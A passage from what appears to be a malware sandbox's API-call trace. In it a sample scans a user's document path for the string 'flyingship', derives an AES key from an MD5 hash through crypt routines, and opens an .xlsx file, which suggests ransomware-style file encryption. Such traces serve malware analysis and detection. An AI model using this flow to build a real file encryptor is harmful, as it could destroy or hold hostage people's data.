lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ac7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.103] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.103] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0180.103] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.103] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.103] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.103] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.103] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.103] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.103] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0xc1f13840, ftLastWriteTime.dwHighDateTime=0x1d599d6, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 0x90ae18 [0180.103] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.104] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.104] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.104] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0180.104] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.104] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0180.104] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.104] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0180.104] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.104] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.104] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.104] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.104] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0180.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.104] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0180.105] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.105] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.105] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0180.105] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.106] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.106] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.106] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0180.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.140] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.140] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.140] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.140] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.140] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.140] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.140] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.140] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.141] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.141] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.141] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.141] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.142] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.142] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.142] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.142] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.142] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.142] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.143] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0180.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.143] CryptDestroyHash (hHash=0x90af58) returned 1 [0180.143] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.143] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.143] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.143] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.143] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ycwvofdiac7at.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.145] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.145] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0180.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0180.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0180.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.145] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0180.146] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0180.146] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, 